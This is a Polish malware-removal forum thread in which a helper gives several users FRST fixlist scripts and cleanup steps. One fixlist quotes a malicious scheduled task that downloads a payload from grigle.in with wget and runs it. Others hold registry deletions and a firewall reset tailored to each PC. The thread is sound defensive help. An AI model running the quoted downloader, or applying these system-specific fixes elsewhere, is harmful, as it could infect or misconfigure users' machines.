GAMES\The Sims 2 Rezydencje i ogrody Akcesoria\TSBin\Sims2Launcher.exe Task: {4093740D-4DBF-439C-81FB-2D71B39AE580} - System32\Tasks\{3DDE85BA-5F25-426E-831E-E851F3445445} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {4DEB46B7-C65D-463D-8620-A7CC7CB06F56} - System32\Tasks\{0AB73D29-99AA-4DB7-B717-431A14F27308} => pcalua.exe -a "E:\Gry\The Sims 2\12_Updates\1_Original.exe" -d "E:\Gry\The Sims 2\12_Updates" Task: {7B119518-1A81-407A-9AA5-2026656037FF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=FLBXfL38mG;Minecraft_1.8.1_Setup.exe;1434626853 & start cmd /R dat.bmp Task: {800E7216-623D-4E65-B227-79C53729825B} - System32\Tasks\{9427E5F8-79EC-4457-A9B6-DA06BAFDAFAF} => C:\Program Files\EA GAMES\The Sims 2 Rezydencje i ogrody Akcesoria\TSBin\Sims2Launcher.exe Task: {860F0765-A6A5-40DA-AC58-89A92CE6A4B0} - System32\Tasks\{E9508B9A-3CA0-4538-8EDD-848FCCC4F067} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {A0E0A8FA-2CC4-4A65-BCEF-D5BEC8690CFF} - System32\Tasks\{8943EBDB-1AF1-4212-B584-F3FB2927162A} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {A7E240D8-3525-4969-8F03-ABE86043A4CE} - System32\Tasks\{9363E1D2-2840-4E70-8EFE-F18DAA81E113} => E:\Gry\The Sims 2\13_Crack\TSBin\Sims2EP9.exe Task: {B5173413-CC7E-4A06-BCD1-41FE726C69E6} - System32\Tasks\{F5232608-CABF-4999-B9C2-08B7832D2FBE} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {BBB8B26A-5B68-4C66-A813-A4FA33C6F026} - System32\Tasks\{18CB654B-8D71-46C8-B865-DBD4E1CE8312} => C:\Program Files\Machinarium\machinarium.exe Task: {C73C8342-FB00-4E04-8311-25F81D8DAF01} - System32\Tasks\{4DBE77BC-8D8D-4B48-B955-588D29A336CF} => C:\Program Files\EA GAMES\The Sims 2 Rezydencje i ogrody Akcesoria\TSBin\Sims2Launcher.exe Task: {ECE14206-E29C-49E7-BE12-56B983828C0E} - System32\Tasks\{8BE9D02F-1EBB-45A4-919F-A7838D8C2BA5} => pcalua.exe -a "C:\Program Files\The Vanishing of Ethan Carter\Binaries\Launcher.exe" -d "C:\Program Files\The Vanishing of Ethan Carter\Binaries" Task: {F1C5DABB-41F4-47CA-9680-B5555961C80B} - System32\Tasks\{AC6BFA93-3B46-4B80-B02E-4B66AC5E441E} => pcalua.exe -a G:\Setup.exe -d G:\ Task: {F222E6AE-CD1D-48E2-AD4B-B92C62D71CEF} - System32\Tasks\{E6F600D8-5B0B-45C3-819D-33D545B5377F} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2EP9.exe Task: {F693F2FC-8AC6-4971-8BE0-23173167364D} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files\Dropbox\Update\DropboxUpdate.exe [2015-08-26] (Dropbox, Inc.) Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files\Dropbox\Update\DropboxUpdate.exe Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files\Dropbox\Update\DropboxUpdate.exe S2 dbupdate; C:\Program Files\Dropbox\Update\DropboxUpdate.exe [136048 2015-08-26] (Dropbox, Inc.) S3 dbupdatem; C:\Program Files\Dropbox\Update\DropboxUpdate.exe [136048 2015-08-26] (Dropbox, Inc.) R3 cpuz134; \??\C:\Users\Lisqui\AppData\Local\Temp\cpuz134\cpuz134_x32.sys [X] SearchScopes: HKU\S-1-5-21-3357052344-2897467679-35886000-1000 -> {B9C3FD9C-B7E6-4fc2-9BCE-A1291F5C54C5} URL = hxxp://uk.search.yahoo.com/search?p={searchTerms}&fr=chr-devicevm&type=EGMB SearchScopes: HKU\S-1-5-21-3357052344-2897467679-35886000-1000 -> {DD18385B-81E9-4569-B0D8-661ECA1902D2} URL = hxxp://www.google.com/custom?client=pub-3794288947762788&forid=1&channel=5369970905&ie=UTF-8&oe=UTF-8&safe=active&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A336699%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT%3A0000FF%3BGIMP%3A0000FF%3BFORID%3A1&hl=pl&q={searchTerms} FF user.js: detected! => C:\Users\Lisqui\AppData\Roaming\Mozilla\Firefox\Profiles\bwd06fxs.default-1445621495842\user.js [2015-10-23] CMD: type "C:\Program Files\Mozilla Firefox\defaults\pref\itms.js" C:\Program Files\Mozilla Firefox\defaults\pref\itms.js C:\Program Files\DAEMON Tools Pro C:\Program Files\Dropbox C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\Users\Lisqui\AppData\Local\Dropbox C:\Users\Lisqui\AppData\Roaming\DAEMON Tools Pro C:\Users\Lisqui\Downloads\DriverDetective.exe C:\Users\Lisqui\Downloads\ReimageRepair.exe C:\Windows\Reimage.ini Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BCU" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DAEMON Tools Pro Agent" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Dropbox" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Logitech Download Assistant" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy są jakieś widoczne zmiany.

tomcio123, nie jesteś na forum "świeżakiem", zasady działu nie zrealizowane: KLIK. Dodaj obowiązkowe raporty. A od ComboFix z daleka, obecnie większość spraw da się załatwić bez uruchamiania tego narzędzia.

Na temat pobierania z dobrychprogramów: KLIK. "Asystent pobierania" tego portalu wprowadził w system szkodliwe elementy. Problem z ładowaniem stron tworzy poniższe zadanie, które powinno także produkować reklamy "PriceFountain" na stronach typu Allegro: Task: {186D95C5-B64C-4D95-8CE0-16ADE63055B5} - System32\Tasks\ForedateMountebanksV2 => Rundll32.exe EmulsifiersBiggish.dll,main 7 1 Akcje do przeprowadzenia: 1. Odinstaluj stare wersje: Adobe AIR, Adobe Shockwave Player, Java SE Development Kit 7 Update 71 (64-bit), Opera 12.17. 2. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {186D95C5-B64C-4D95-8CE0-16ADE63055B5} - System32\Tasks\ForedateMountebanksV2 => Rundll32.exe EmulsifiersBiggish.dll,main 7 1 S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X] HKLM-x32\...\Run: [] => [X] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Clients\StartMenuInternet\Opera DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B53F81E7-905A-4952-A5F0-2B4E7C57A791} DisableService: PLAY ONLINE. RunOuc C:\Program Files (x86)\Mozilla Firefox\plugins C:\Users\Pawel\AppData\Local\ForedateMountebanks CMD: netsh advfirewall reset RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition ale bez Shortcut. Dołącz też plik fixlog.txt. Potwierdź ustąpienie problemu.

Jak konkretnie zachowuje się instalator CCleaner: brak reakcji, jakiś szczególny błąd? Brak widocznych oznak infekcji. Stan zabezpieczeń tragiczny. Rozpocznij od deinstalacji groźnej wersji J2SE Runtime Environment 5.0 oraz kompleksowej aktualizacji całego Windows. Linki do podstawowych instalatorów: KLIK. Platform: Microsoft Windows XP Professional Dodatek Service Pack 2 (X86) Język: Polski Internet Explorer Wersja 6 (Domyślna przeglądarka: FF)

W raportach brak jakichkolwiek oznak infekcji pasujących do opisywanego zdarzenia. Jest na dysku widoczny tylko jeden drobny szczątek adware (folder "Shortcut") i nic poza tym. Tylko kosmetyczne zadania do przeprowadzenia: 1. Odinstaluj starą wersję i zbędny program: Adobe Reader X (10.1.11) - Polish, HP Deskjet 2510 series — badanie mające na celu poprawę produktów. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\Documents and Settings\All Users\Dane aplikacji\F-Secure C:\Documents and Settings\Dom\Dane aplikacji\Shortcut C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\avast! Internet Security.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Centrum obsługi HP.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Corel CONNECT X6.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\HP Photosmart Essential 2.5.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Narzędzie Wireless N USB.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Nero StartSmart.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\PITy 2012.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Szkoła\2006-2007\Skrót do paliwo - maj 2008.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Zbyszek dokumenty\Szkoła\2006-2007\Skrót do paliwo - maj 2008.lnk C:\Documents and Settings\Dom\Ustawienia lokalne\Dane aplikacji\ars.cache C:\Documents and Settings\Dom\Ustawienia lokalne\Dane aplikacji\census.cache C:\Documents and Settings\Dom\Ustawienia lokalne\Dane aplikacji\housecall.guid.cache C:\Documents and Settings\Dom\Ustawienia lokalne\Dane aplikacji\F-Secure C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\WINDOWS\system32\Drivers\tmcomm.sys C:\WINDOWS\Tasks\At*.job EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wyłącz COMODO, gdyż zablokuje FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw ten plik. Nowe skany FRST nie są mi potrzebne.

Na koniec: 1. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 2. Sugerowane dodatkowe zabezpieczenia specjalizowane pod kątem infekcji szyfrujących dane: KLIK.

Powód czyszczenia folderów Przywracania systemu jest przecież wyjaśniony w opisie tej operacji. Po czyszczeniu system w pewnym momencie samodzielnie utworzy kolejny punkt Przywracania, ale oczywiście możesz wyprzedzić fakty i zrobić zaraz po czyszczeniu ręcznie punkt. On i tak nie utrzyma się za długo, bo magazyn na punkty jest ograniczony i system okresowo samoistnie oczyszcza punkty, by się zmieściły nowe.